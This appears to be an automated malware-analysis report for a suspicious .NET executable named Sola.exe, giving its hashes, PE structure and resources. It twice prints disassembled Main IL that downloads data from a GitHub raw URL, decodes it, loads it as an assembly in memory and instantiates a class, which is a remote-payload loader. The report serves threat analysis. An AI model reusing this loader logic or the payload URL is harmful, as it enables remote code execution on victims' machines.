Suspicious
Suspect

09cd45fa049f318ac513baa0fbaba05d

PE Executable
|
MD5: 09cd45fa049f318ac513baa0fbaba05d
|
Size: 288.77 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
09cd45fa049f318ac513baa0fbaba05d
Sha1
115ea9a17f1df22fdab520a049259c936d45b9ac
Sha256
096969ec03672f1e696a96deebf1f6d4d5e285e77c7aea8ea676cf37f8e5e91a
Sha384
401bd53a9c37195a14fab09f5cc0e3e50c9d652900d2e0324a47f34b2f9b6a1d533564f07c5363c35e339e06963a49a7
Sha512
32f58dc0cb814aff636849805164aeab78503c27a45688c4fad7ebc732e9f182743c0939cfc18da8aa6417f3e0a8398bc340935101b61b2aeba44ae873f9d2ce
SSDeep
3072:4ez2hOamInrXoBsD6Y/2yTdUxsX61PYGNQ:4egnrXoBs7w
TLSH
2754659831A4C263EBAE8D71E4CD44F129E25C7DE888705FAA76BF5574702A124CED3C

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
09cd45fa049f318ac513baa0fbaba05d
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Sola.Form1.resources
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\Administrator\Desktop\WindowsFormsApp1\obj\Debug\Sola.pdb
Module Name

Sola.exe
Full Name

Sola.exe
EntryPoint

System.Void Sola.Program::Main()
Scope Name

Sola.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Sola
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6.1
Total Strings

45
Main Method

System.Void Sola.Program::Main()
Main IL Instruction Count

33
Main IL

nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) nop <null> ldstr https://github.com/Zankop/winapps/raw/refs/heads/Zankop-patch-1/1810 stloc.1 <null> ldloca.s V_0 newobj System.Void System.Net.WebClient::.ctor() ldloc.1 <null> call System.Byte[] System.Net.WebClient::DownloadData(System.String) stfld System.Byte[] Sola.Program/<>c__DisplayClass0_0::data nop <null> call System.AppDomain System.Threading.Thread::GetDomain() ldloca.s V_0 call System.Byte[] Sola.Program::<Main>g__Ealaboris|0_0(Sola.Program/<>c__DisplayClass0_0&) callvirt System.Reflection.Assembly System.AppDomain::Load(System.Byte[]) stloc.2 <null> ldloc.2 <null> ldstr B callvirt System.Object System.Reflection.Assembly::CreateInstance(System.String) pop <null> ldc.i4.m1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> call System.Void System.Windows.Forms.Application::EnableVisualStyles() nop <null> ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) nop <null> newobj System.Void Sola.Form1::.ctor() call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form) nop <null> ret <null>
Module Name

Sola.exe
Full Name

Sola.exe
EntryPoint

System.Void Sola.Program::Main()
Scope Name

Sola.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Sola
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6.1
Total Strings

45
Main Method

System.Void Sola.Program::Main()
Main IL Instruction Count

33
Main IL

nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) nop <null> ldstr https://github.com/Zankop/winapps/raw/refs/heads/Zankop-patch-1/1810 stloc.1 <null> ldloca.s V_0 newobj System.Void System.Net.WebClient::.ctor() ldloc.1 <null> call System.Byte[] System.Net.WebClient::DownloadData(System.String) stfld System.Byte[] Sola.Program/<>c__DisplayClass0_0::data nop <null> call System.AppDomain System.Threading.Thread::GetDomain() ldloca.s V_0 call System.Byte[] Sola.Program::<Main>g__Ealaboris|0_0(Sola.Program/<>c__DisplayClass0_0&) callvirt System.Reflection.Assembly System.AppDomain::Load(System.Byte[]) stloc.2 <null> ldloc.2 <null> ldstr B callvirt System.Object System.Reflection.Assembly::CreateInstance(System.String) pop <null> ldc.i4.m1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> call System.Void System.Windows.Forms.Application::EnableVisualStyles() nop <null> ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) nop <null> newobj System.Void Sola.Form1::.ctor() call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form) nop <null> ret <null>
09cd45fa049f318ac513baa0fbaba05d (288.77 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙